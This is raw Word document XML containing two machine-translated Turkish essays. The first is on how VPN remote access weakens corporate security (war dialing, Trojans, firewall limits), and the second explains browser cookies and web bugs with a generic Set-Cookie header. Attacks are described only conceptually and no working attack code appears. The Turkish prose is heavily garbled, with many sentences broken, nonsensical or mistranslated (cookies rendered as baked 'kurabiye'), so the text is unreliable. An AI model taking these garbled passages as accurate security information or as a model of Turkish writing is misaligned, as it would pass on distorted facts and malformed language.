        <w:t>bulunduğu binayı koruduğunu düşünün. Ağdaki verilerin iç ağdayken açık alanda paylaşıldığını ve erişildiğini varsayalım. Katılan her sistem kuruluş tarafından eşit olarak korunur ve kontrol edili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mdi, sistemlerden birini kontrolsüz uzak bir yere götürün ve noktadan noktaya bir bağlantı kuru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odemlerle. Uzaktaki bilgisayar hala yalıtılmış durumda ve dışındaki güvenilmeyen sistemlere bağlı deği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lefon sistemi İletişimin kendisi göreceli olarak isimsizdir ve müdahalesi karmaşık olacakt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eşfedilirse. Bununla birlikte, VPN’lerde gördüğümüz gibi, şifreleme telefon sistemi üzerinden protokole uygulan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fazla koruma için.</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onra, aynı sistemi uzak bir yere götürün ve İnternete bağlayın ve İnternet’e bir VPN kuru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rket ağı. Artık sistem, bilgisayar kullanıldığında yapılan kontrolün ötesinde etkilere maruz kal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rket ofisinde idi; yine de aynı erişime izin verilmekte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ukarıdaki üç örnekte, bilgisayar kontrollü bir şekilde tutulurken güvenlikteki bozulma meydana ge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 bir yere ortam ve çevirmeli erişim sağlanır. Riskler, çalınan sistemden değişiyo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lefon şebekesi üzerinden iletişim kurulurken iletimin yakalanma ihtimalinin yüksek olması, ancak sistemin genel güvenliği ve bilgiler göreceli olarak korunmaya devam etmektedir. Bununla birlikte, uzak bilgisayar İnternete yerleştirildiğinde, tehditlere maruz kalma ve çalışma riski art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atlanarak.</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Örneğin başında, sistemler yetkisiz kişilerden izole edilmiş bir koruma zarfında bulunu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oruma katmanları etkiler. Ardından, koruma zarfı uzaktaki çevirme sistemine kadar uzanıyoruz; anlaşılır bir şekilde, zarf zayıflamış, ancak bilginin korunmasını sağlamak için kesinlikle doğada var. Uzaktan çevirme sistemi, tahkimatlı çevre ortamı tarafından sağlanan korumanın bir kısmını kaybeder ve sınırlı tehditlere maruz kalır, ancak asıl önemli olan, şirket sitesi için güvenlik zarfı etkilenmemesidi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rçekte, uzak sistemlerin doğrudan arama yapmasına izin verme riskleri tipik olar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etkisiz erişim, genellikle telefon sistemi aracılığıyla kazanılır. Kurumsal uzaktan kumandaya telefon numaraları sağ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ullanıcıların erişebilmesi için bu sayılara gezegenin her yerinden erişilebilir. Saldırganlar, hedef uzaktan erişim numaralarını dahil etme olasılığı yüksek olan telefon numarası aralıklarını kolayca ve hızlı bir şekilde belirleyebilir. Menzil bilindikten sonra, her numarayı saldırgandan çok az veya hiç müdahalede olmadan test etmek için bir telefon tarama veya “savaşçı arama” programı kullanılabilir. Bununla birlikte, bu riskleri kontrol altında tutmayı başaran birçok faktör vardır. Geri arama, gelişmiş ve çok katmanlı kimlik doğrulama, kapsamlı günlük kaydı, zaman kısıtlamaları ve erişim kısıtlamaları saldırgan için zorlu bir hedef oluşturmak için birleştirilebilir. Sadece tek bir erişim noktası ve uzaktaki sistem yalıtımlı olduğunda, güvenlik zarfı sağlam ve somut kalır. Elbette, bozunma derecesi, şirketteki tek erişim noktasının güvenliği ve uzaktaki sistemin izolasyon düzeyi ile doğrudan ilgili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VPN'nin istihdamının İnternet üzerinden kurumsal bağlantı sağladığı son senaryoda, çevirmeli erişim çözümlerinden daha büyük veya eşit olmasa bile, güvenlik çok yüksek olarak algılanmaktadır. Neden olmasın? Aynı özelliklere ve tartışmalı olarak aynı güvenliğe sahip oldukları görülüyor. Çevirmeli bağlantı çözümlerinde iletişim nispeten korunur, şirkette sonlandırma sağlayan sistem güvence altına alınabilir ve yetkisiz erişimi azaltmak için doğrulama önlemleri alınabilir. VPN'ler de bu özelliklere sahiptir ve kapsamlı bir güvenlik zarfı elde etmek için kullanı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e yazık ki, VPN normalde bulunmayan bir güvenlik cephesi olan şeffaf bir zarf sun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ler bir protokol olarak çok başarılı olmasaydı, bu yoğunluk. Kurumsal olarak sağlanan zarf, uzaktaki sistemin güvenlik ve koruma istihdamının kontrolünü kazandığı gerçeğinden dolayı VPN'lerle bir kırılma noktasına kadar uzanıyor. Güvenlik zarfının artık olmadığı çok açık olac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rket tarafından verilen veya yönetilen ancak bunun yerine uzaktaki sistem artık tüm güvenlik denetleyicileridir - yerel olar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kurumsal içine. Uzak bir sistem İnternete bağlanır ve İnternet topluluğunun geri kalanıyla iletişim kurmak için ISS'den bir IP adresi alır. İnternetteki bir yerde, şirket ağındaki dahili ağa erişim sağlayan bir VPN ağ geçididir. Uzak sistem veri paylaşmak için VPN'i kurdukça, şirket tarafından alınan güvenlik önlemlerini tamamen aşabilecek bir dizi güvenlik açığı ortaya çıkmışt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normalde güvenlik zarfını sağlıyor olacaktı. İnternete bağlanma noktası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fark edilmiş güvenlik yuvarlanması gerçekleşiyor ve uzaktaki sistem hakim, jüri ve muhtemele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şirket güvenliğinin cellat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 sistem, ana bilgisayar sisteminin bir yönlendirici görevi görmesine ya da bilgilerin İnternet'ten özel ağa iletilmesine izin vermeyen çok sağlam bir VPN çözümü kullanmış olabilir. Bir adım daha ileri gitmek için, VPN çözümü sınırlı güvenlik duvarı yetenekleri veya sınırlamak için filtreleme konseptleri kullan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ili ağa erişim. Bununla birlikte, muhtemelen VPN istemcisi veya güvenlik duvarı tarafından sağlanan korum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azılım kullanıcılar tarafından kapatılabilir ve sonunda onları saldırıya açabilir. Bir paket olabilir halind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ullanıcının koruma paketini kapatamadığı durumlarda uygulanan güvenlik açığı olacağı varsayı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nu düzeltmek için bir yama gerektiren ortaya çık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senaryo oldukça yaygındır ve güvenlik duvarı ve çevre güvenliği için neredeyse her gün meydana ge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öneticiler sadece sınırlı sayıda güvenlik duvarına yetişmeye çalışıyorlar. Dikkat eksikliği göz önüne alındığı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normalde birçok kuruluşta güvenlik duvarı bakımına bakıldığında, yalnızca dağılmanın hayal edilebileceği tahmin edilmekte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taki sistemin güvenlik duvarı yazılımında güvenlik açıkları bulunduğunda güvenlik</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p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:pStyle w:val="HTMLncedenBiimlendirilmi"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="24"/>
        </w:rPr>
        <w:t>Güvenlik açığı kavramları</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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m olarak yeterli hale getirilen algılanan kurumsal güvenliğin imhasının uç noktasını tam olarak anlam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eknoloji ve süreçlerin miktarları, uzak sistemin açık ve maruz kaldığını bilmek gerekl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Bazı durumlarda, geniş bantta olduğu gibi, pozlama sabittir ve uzun sür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hmin edilebilir - bir saldırganın en büyük varlığı.</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çok sayıda insan ve teknoloji yüzünden, başka bir şey değilse, bir tehdit denizi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nonim olarak başkalarına, özellikle hazırlıksız olanlara zarar vermek için kullanılabilir. Bir kaç tane v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farklı kullanımlar için olan ve iletişimdeki farklı katmanları etkileyen farklı saldırı türleri. İçi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Örneğin, hizmet reddi (DoS) saldırıları, yalnızca yıkıcı bir amaç olan bir sistemin veya hizmetin kullanılabilirliğini ortadan kaldırmak için tasarlanmıştır. DoS saldırıları düşük seviye iletişim özelliklerinde zayıflıklardan yararlan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protokol güvenlik açığı veya uygulamanın kendisinde bulunabilecek üst düzey zayıflıklar gibi. Diğer bazı saldırılar çok özel uygulamalara sahiptir ve erişim sağlamak veya bilgi edinmek için belirli durumlar için tasarlanmıştır. Bu saldırıların uygulama hatalarından ve tuhaflıklarından yararlanarak görülmesi gittikçe yaygınlaşıyor. Sonuçlar, sistem bilgilerini almak veya hatta ana bilgisayarı uzaktan kontrol etmek için özel olarak tasarlanmış uygulamalar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rojanlar, çoğunlukla popüler işletim sistemlerinde ve çok becerikli programlayıcılardaki büyük zayıflıklar nedeniyle çok karmaşık ve kullanımı kolay hale geldi. İnternette oturan tipik bir sistem, yalnızca sisteme erişmek, ana bilgisayar sisteminin bölümlerini uzaktan kontrol etmek, yerel olarak depolanan verileri elde etmek ve klavye girişi toplamak için kullanılamayan, ancak ana bilgisayar ne zaman saldırganı bilgilendirebilecek bir Trojan kurmuş olabilir. sistem</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vrimiçi ve erişime hazır. Bazı durumlarda, bilgiler çevrimdışı toplanabilir ve ne zaman saldırgana gönderil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bağlantısı kurban tarafından kurulur. En kötü senaryoyu temsil eden bu güvenlik açığıdır ve ne yazık ki, etkilenen tipik bir ev sisteminin yaygın olduğu bir durumdur.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>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ruva atının tamamen yüklenemediği veya uygulanamadığı bir durumda, bir saldırgan yeterli erişim sağlay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geçici olsa bile, hedeflenen sistem veya kullanıcı hakkında hayati bilgiler toplamak, sonuçta dah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iyi sonuçlar veren saldırılar. Anti-virüs programlarının ve ana bilgisayar tabanlı güvenlik duvarı uygulamalarının yapabileceği söylen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ullanıcının güvenlik açıklarını azaltmasına ve onları keşfetmesine yardımcı olmalarına ve muhtemelen onları gidermelerine yardımcı olma. Ne yazık ki, bu tür uygulamaların uygulanması, bakımı ve günlük güvenli kullanımı kullanıcının elindedir. Bununla birlikte, uzman personel ile rafine, son derece teknik ortamları korumak, Internet'e yayılmış çok daha az uzak sistemleri korumak için yeterince karmaşıktır.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="40"/>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Çözümler</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>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lbette, VPN'lerin uygulanmasıyla sunulan güvenlik ikilemine kolay bir çözüm yoktu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elişmiş teknoloji ile bile, kuruluşlar bilgisayar korsanlarını durduramaz. Sistemlere erişmeye devam ediyor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örünürde kolaylıkla korunan ağlarda. Bunun çoğu zayıf tasarıma bağlanabilir, aradaki boşluk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akım, yanlış yapılandırma veya basit cehalet. Her durumda, çevreye odaklanar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yetkisiz erişim hala endişe verici bir oranda gerçekleşiyor. Binlerce olmasa da yüzlerce bu senaryo göz önüne alındığı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teki uzak bilgisayarlardan, onları korumak için ne yapılabilir? Bir iç ağ varsa, basitçe ifad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oruna en iyi çaba harcandığında korunamazl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vde ve yolda kitle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er türlü sağlam güvenlik uygulamasında olduğu gibi, bilgilerin korunmasında bir güvenlik politikası çok önemlidir. belirtm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 erişimi için veri erişim kısıtlamaları ve işletme parametreler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 Başka bir deyişle, uzaktan çalışma için belirli bir bilgi türüne ihtiyaç duyulmazsa, o zaman uz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rişim sistemleri bu bilgiye veya sisteme erişim sağlamamalıdır. Sadece genişliği azaltar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tan erişim çözümü tarafından sağlanan erişim, veriler doğal olarak korunabilir. Neyin sınırlandırılması uygulamas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slında uzak kullanıcılar tarafından erişilebilir durumda, iç ağı VPN topluluğundan koruyan görünen VPN aygıtlarının arkasındaki güvenlik duvarları şeklinde gerçekleşmiştir. Ne yazık ki, bu tasarımın çok büyük kısıtlamaları var ve erişim esnekliği açısından VPN'in ölçeklenebilirliğini sınırlayabilir. Bir başka olasılık da dahil olm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PN erişim cihazında kullanılan filtreleme yöntemlerinin listesi. Enjekte edilen trafiği kontrol etmek için filtreler oluşturu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ili ağa bağlanılır ve bazı durumlarda filtreler gerçek kimliği doğrulanmış kullanıcılar veya gruplarla ilişkilendirilebili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rişim ne kadar kısıtlı olursa olsun, bir noktada uzaktaki bir kullanıcı hassas bilgiler ister ve herkes</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ullanıcılar için uygulama hizmetleri bu “özel durum” ile karşı karşıya kalmıştır. Bu nedenle, teknoloji devralmak zorund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yi korumak için. Tıpkı iç ağlarımızı İnternetten korumak için güvenlik duvarlarına baktığımız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Uzaktaki sistemleri, özel bilgilerin bilinmeyene aktarılmasından korumak için teknolojiyi tekrar arayı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na bilgisayar tabanlı koruma yazılımının uygulanması tamamen yeni değildir, ancak saldırıların sayısı artmakta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işisel sistemler varlıklarının farkındalığını arttırdı. Bununla birlikte, bu uygulamalar nokta çözümleridir ve güvenliği sağlamak için ölçeklenebilir, esnek veya merkezi olarak kontrol edilen veya yönetilen bir çözüm değildir. Temel olarak, her kullanıcı, gerçekleştirdiği güvenlik duruşundan sorumludu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rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
        </w:rPr>
        <w:t>Sonuç</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 xml:space="preserve">VPN'ler son derece değerli olabilir; zamandan, paradan tasarruf sağlayabilir, erişimi genişletebilir ve kuruluşların iletişimde en üst düzeyde esneklik kazanmasını sağlayabilirler. Ancak, bir VPN tarafından </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>sağlanan özel bağlantı sanal bir arka kapı açabilir. Saldırganlar. Hassas verilerin bir VPN'den geçmesine izin veren kuruluşlar, bu bilgileri bir Korunan iç ağda bulunmayan tehditlerin bolluğu. Her biri kendi bağlantı kurma, bağlantıyı sürdürme ve genellikle iç ağda bulunan hizmetleri sağlama yöntemlerine sahip birçok VPN ürünü türü vardır. Maalesef, uzaktaki sistem VPN üzerinden merkez ofisle özel bir iletişimde bulunmuyorsa, sistem son derece savunmasız sayılabilir. İnternet hayatlarımıza ve günlük aktivitelerimize nüfuz edecek şekilde büyüdü, ancak her zaman kumda toplam asimilasyondan ayrılmanın ölçülebileceği bir çizgi çizildi. Güvenlik duvarları, modemler, yönlendiriciler, filtreler ve hatta tarayıcılar gibi yazılımlar İnternete görünür bir erişim noktası sağlayabilir. Teknoloji daha yaygın hale geldikçe, İnternet ve özel ağlar arasındaki sınır belirsizleşmeye başlayacaktır. Maalesef, uygun öngörüler olmadan, güvenlik önlemlerinin tahsisi ve azaltma süreçleri bilgi terörizmindeki ilerlemelere ayak uyduramayacak. Düzgün bir şekilde planlanmamış ve kontrol edilmemişse, görünüşte güvenli bir şekilde bir tahkimat haline getirilmiş görünmesi diğer tüm korumayı olumsuz etkileyebilir; Bir kalenin duvarları doğrudan yanlarına gelmeyen bir saldırıya karşı etkisiz olacaktı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r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:t>---------------------------------------------------------------------------------------------------------------------</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:t>Çerezler ve Web Hataları: Ne Onlar ve Birlikte Nasıl Çalışırla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ler nedir ve Web hataları nelerdir? Çerezler, bakkalda bulduğumuz ve yemeyi sevdiğimiz çerezler değildir. Aksine, World Wide Web’de bulunan çerezler, bir Web sitesi tarafından oluşturulan ve bilgisayarınızın sabit diskine gönderilen küçük, benzersiz metin dosyalarıdır. Çerez dosyaları, her tıkladığınızda fare tıklatma seçimlerinizi kayded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e gir. Bir Tekdüzen Kaynak Bulucu (URL) yazdıktan sonra, tarayıcınız bu sunucuya bağlan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ve belirli bir Web sitesinin monitörünüzde görüntülenmesini ister. Tarayıcı sabit sürücünüzü ar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iteden zaten bir çerez dosyanız olup olmadığını görün. Bu siteyi daha önce ziyaret ettiyseniz, benzersiz tanımlayıc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önce çerez dosyanızda kayıtlı olan kod tanımlanır ve tarayıcınız çerez dosyası içeriğini tekrar o siteye aktarır. Artık, sunucunun daha önce o siteyi ziyaret ettiğinizde seçtiğiniz şeyin bir geçmiş dosyası var. Bunu daha önce görebilirsiniz; çünkü önceki seçimleriniz ekranınızda vurgulanır. Bu siteyi ilk defa ziyaret ediyorsanız, size bir kimlik atanır ve bu ilk çerez dosyası sabit diskinize kayded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Web hatası, Web sayfasındaki veya kimlerin okuduğunu izlemek için tasarlanmış bir e-posta iletisindeki bir grafikt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Web sayfası veya e-posta mesajı. Bir Web hatası, e-postanın İnternet Protokolü (IP) adresini sağlay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lıcı, alıcının bu bilginin ifşa edilmesini istemesini isteyip istemediğini. Web hataları bilgi sağlay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mesajın ne sıklıkla iletilip okunduğuna bağlı olarak. Web hatalarının diğer kullanımlar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kip eden detaylar. Ayrıca, Web hataları ve çerezler birleştirilebilir ve hatta bir kişininkiyle senkronize edil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e. Web kullanımına göre araştırılacak olumlu, olumsuz, yasadışı ve etik olmayan konular v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öcekler ve kurabiyeler. Bu detaylar da takip ediyo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 Ned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adece son birkaç yılda çerezler tartışmalı bir konu haline geldi, ancak daha önce de belirtildiği gibi, bu tür deği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arkette "Oreos" veya "Famous Amos" ismini taşıyan çerezlerin listes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Web sitesi ile bir bilgisayarın sabit diski arasında geçen bilgiler. Her ne kadar çerezler oluyo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aha popüler bir konu olarak, çerezlerin zor durumda tutulduğunun farkında olmayan birçok kullanıcı va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sürücüler. Çerezlere aşina olanlar, internet gizliliği ve ahlakı konularını gündeme getiriyor. ço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DoubleClick, Inc. gibi şirketler de, şu soruyu soran davalara açıldı: İnternet şirketleri çok mu ileri gidiyor?</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Başlamak için, çerezlerin temelleri açıklanmalıdır. Netscape için Lou Montulli, kurabiyeyi 1994 yılında icat etti. O zaman, bir kurabiye icat etmenin tek nedeni, çevrimiçi alışveriş sepetlerini sağlamaktı. Neden “cookie” adı? “Çerezler… İyi mi Kötülük?” Başlıklı bir makaleye göre, ilk bilgisayar korsanlarının Andy Williams’ın TV programında gösteriye başladıkları söyleniyor. Ayı kıyafetli bir adamın Williams'dan bir kurabiye almak için her türlü hileyi denediği ve “Çerezler olmaz! Şimdi değil, asla değil… HİÇ! ”Bir bilgisayar korsanı“ çerez ayı ”adını ve sinir bozucu anabilgisayar bilgisayar operatörlerini konsollarını devralarak ve“ WANT COOKIE ”mesajı görüntüleyerek aldı. çerez, ”ve çerez ayı bir teşekkür ile cevap verirdi. “Kurabiye”, operatörün sinirlerine zarar vermek dışında hiçbir şey yapmadı. Böylece “çerez” adı ortaya çıkt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Çerez İçeriği</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Tanımlama bilgileri ilk keşfedildiğinde, bu tanımlama bilgilerinin sabit sürücünüzdeki bilgileri tarayabileceği ve şifreleriniz, kredi kartı numaralarınız veya bilgisayarınızdaki bir yazılım listesi gibi ayrıntılar alabileceği söylentileri ortaya çıktı. Bir çerezin çalıştırılabilir bir program olmadığı ve doğrudan bilgisayarınıza hiçbir şey yapamayacağı açıklandığı zaman bu söylentiler reddedilmiştir. Basit bir ifadeyle, çerezler tarafından oluşturulan küçük, benzersiz metin dosyalarıd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Web sitesi ve bir bilgisayarın sabit diskine gönderildi. Bir isim, değer, son kullanma tarihi v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aynak site. Başlık bu bilgiyi içerir ve tarayıcıdan önce belgeden kaldırıl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görüntüler. Tarayıcınızda görünüm veya belge kaynağı komutlarını çalıştırsanız bile bu başlığı göremezsiniz. Başlık, oluşturulduğunda çerezin bir parçasıdır. Sabit diskinize takıldığında, başlık bırakılmıştır. Tanımlama bilgisinden kalan tek bilgi sunucu ile ilgilidir ve başkası yoktu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başlık örneği aşağıdaki gibidir:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:autoSpaceDE w:val="0"/>
        <w:autoSpaceDN w:val="0"/>
        <w:adjustRightInd w:val="0"/>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>Set-Cookie: NAME=VALUE; expires=DATE; path=PATH;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00E77DF4" w:rsidRPr="00552040" w:rsidRDefault="00E77DF4" w:rsidP="00E77DF4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>domain=DOMAIN_NAME; secure</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 xml:space="preserve">ADI = DEĞER gerekli. NAME, çerezin adıdır. VALUE'nin kullanıcı ile ilgisi yoktur; Kaynak sunucunun göndermeyi seçtiği bir şeydir. DATE, çerezin sabit diskinizde ne kadar kalacağını belirler. Son kullanma tarihi yok, Web tarayıcısından çıktığınızda çerezin kullanım süresinin sona ereceğini belirtir. DOMAIN_NAME, çerezi gönderen ve tarayıcı bu sunucudan bir dosya istediğinde bu çerezin bir kopyasını alacak olan sunucunun adresini içerir. Çerezin geçerli olduğu etki alanını belirtir. PATH, bir çerezin sunucuya ne zaman geri gönderileceğini daha fazla tanımlamak için kullanılan bir özelliktir. Secure, çerezin yalnızca güvenli bir kanal kullanılıyorsa gönderileceğini belirtir. Birçok farklı tipte çerezler kullanılır. En yaygın tür, ziyaretçi çerezi olarak adlandırılır. Bu tutar bir siteye kaç kez döndüğünüzü izleyin. Hangi sayfaların birden fazla alan Webmaster’ı uyardığı ziyaretler. İkinci bir çerez türü, bir kullanıcının sayfanın nasıl yükleneceğine ilişkin seçtiği değerleri depolayan tercih edilen bir çerezdir. Özelleştirilmiş ana sayfaların ve site kişiselleştirmenin temelidir. Sayfada hangi renk şemalarını tercih ettiğinizi veya bir aramadan kaç sonuç sevdiğinizi hatırlayabilir. Alışveriş sepeti çerezi, </w:t>
      </w:r>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>çevrimiçi siparişi ile popüler bir tanesidir. Bir çerez aracılığıyla size bir kimlik değeri atar. Öğeleri seçtiğinizde, bu öğeyi içerir sunucudaki kimlik dosyasında. En ünlü ve tartışmalı olan, izleme çerezidir. Bu benzer alışveriş sepeti çerezi, ancak kimlik dosyanıza öğe eklemek yerine, ziyaret ettiğiniz siteleri ekler. Satın alma Hedefli pazarlama için alışkanlıklar toplanır. Potansiyel olarak, şirketler tarafından sağlanan e-posta adreslerini kaydedebilirsiniz. kullanıcı ve sizi hakkında topladıkları bilgilere dayanarak sizi spam. Çerezler sadece veriler dolaşırken kullanılır. Tarayıcınıza bir URL yazdıktan sonra, sunucu ve bu Web sitesini ister. Tarayıcı, zaten bir çerez dosyanız olup olmadığını görmek için makinenize bakar siteden. Bir çerez dosyası bulunursa, tarayıcınız çerezdeki tüm bilgileri o siteye gönderir. URL. Sunucu bilgileri aldığında, artık alışverişinizi keşfetmek için çerezi kullanabilir. tarama davranışı Çerez alınmazsa, size bir kimlik atanır ve makinenize şu şekilde gönderilir: sonraki ziyaretinizde kullanılacak bir çerez dosyası.</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Çerezler hakkında olumlu şeyle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Öncelikle, çerezlerin amacı, göz atma geçmişinizdeki bilgileri takip etmektir. Bir kullanıcı çerezleri kullanan bir siteye eriştiğinde, kullanıcının tarayıcısına en fazla 255 bayt bilgi iletilir. Kullanıcı bir dahaki sefere siteyi ziyaret ettiğinde, çerez sunucuya geri gönderilir. Çerez, kullanıcının ziyaret ettiği sayfaların bir listesini veya kullanıcının önceki ziyaretlere dayanarak görüntüleme modellerini içerebilir. Çerezler sayesinde, bir site kullanım modellerini izleyebilir ve siteye giriş yaptıklarında görüntülenen bilgileri kişiselleştir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kincisi, çerezler pazarlamacılara bilgi hazinesi sağlayabilir. İnternet çerezleri kullanarak, çevrimiçi işletmeler, belirli tüketicilerin ihtiyaçları ve ilgi alanlarıyla alakalı reklamları hedefleyebilir. Hem tüketiciler hem d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pazarlamacılar çerezleri kullanmaktan yararlanabilirler. Pazarlamacılar daha yüksek bir Tıklama Oranı izleyicisine ulaşırken, müşteriler yalnızca ilgilerini çeken reklamları görüntüleyebilir. Ayrıca, çerezler tekrarlı reklamları engelleyebilir. Internet</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Focalink ve DoubleClick gibi pazarlama şirketleri, bir İnternet kullanıcısının aynı reklamları tekrar tekrar görmek zorunda olmadığından emin olmak için çerezler uygular. Ayrıca, çerezler, kullanıcıların internette gezinme alışkanlıklarını inceleyerek pazarlamacılara tüketici davranışlarını daha iyi anlamalarını sağlar. NCR, Inc. ve Sift, Inc. gibi ileri veri madenciliği şirketleri, çerez dosyalarındaki müşterilerle ilgili bilgileri analiz edebilir ve tüm tüketicilerin ihtiyaçlarını daha iyi karşılayabil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çevrimiçi sipariş sistemi, bir kişinin ne almak istediğini hatırlamak için çerezleri kullanabilir. Örneğin, eğer b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üşteri bir sitede bir kitap aramak için saatlerce alışveriş harcıyor ve sonra aniden çevrimdışı olmak zorund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müşteri siteye daha sonra geri dönebilir ve ürün hala alışveriş sepetinde olacaktı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Site kişiselleştirme, çerezlerin bir diğer yararlı kullanımıdır. Diyelim ki bir kişi CNN.com sitesine geliyor ama</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herhangi bir spor haberini görmek istemiyor; CNN.com bu kişinin bunu bir seçenek olarak seçmesine izin veriyor. O andan itibare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 sona erene kadar), kişinin CNN.com'da spor haberlerini görmesi gerekmez.</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İnternet kullanıcıları şifrelerini ve kullanıcı kimliklerini saklamak için çerezleri kullanabilirler, böylece bir dahaki sefer oturum açmak ister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Web sitesine parola veya kullanıcı kimliği girmeleri gerekmez. Ancak, çerezlerin bu işlev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sayar diğer kullanıcılar arasında paylaşılıyorsa, güvenlik riski oluşturabilirsiniz. Hotmail ve Yahoo, bazı orta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çerez türünü kullanan siteler, e-posta kullanıcıları için daha hızlı erişim sağlamak için kullanılı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ler, “E-Ticaretin‘ Çerez Canavarı ’Görüntüsünün Yok Edilmesi” bölümünde açıklanan avantajlarına sahiptir. Çerezler, belirli tüketici ihtiyaçları ve ilgi alanlarıyla alakalı reklamları hedefleyebilir. Bu, yüzlerce uygunsuz ve istenmeyen reklamları uzak tutarak bir kullanıcıya yarar sağlar. Çerezler tekrarlayan afiş reklamları önler. Ayrıca, çerezlerin kullanımı yoluyla, şirketler tüketici davranış alışkanlıklarını daha iyi anlayabilirler. Bu, pazarlamacıların çoğu tüketicinin ihtiyaçlarını karşılamasını sağlar. Çerezler, söz konusu bilgisayardaki kullanıcının sitesinde saklanır. Çerezleri devre dışı bırakmak kolaydır. Internet Explorer 4.0'da Görünüm, Internet Seçenekleri komutunu seçin ve Gelişmiş'i tıklayı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lastRenderedPageBreak/>
        <w:t>sekmesini tıklayın ve Tüm Çerezleri Devre Dışı Bırak seçeneğini tıklayın.</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b/>
          <w:sz w:val="26"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00552040">
        <w:rPr>
          <w:rFonts w:asciiTheme="majorHAnsi" w:hAnsiTheme="majorHAnsi" w:cstheme="majorHAnsi"/>
          <w:b/>
          <w:sz w:val="26"/>
        </w:rPr>
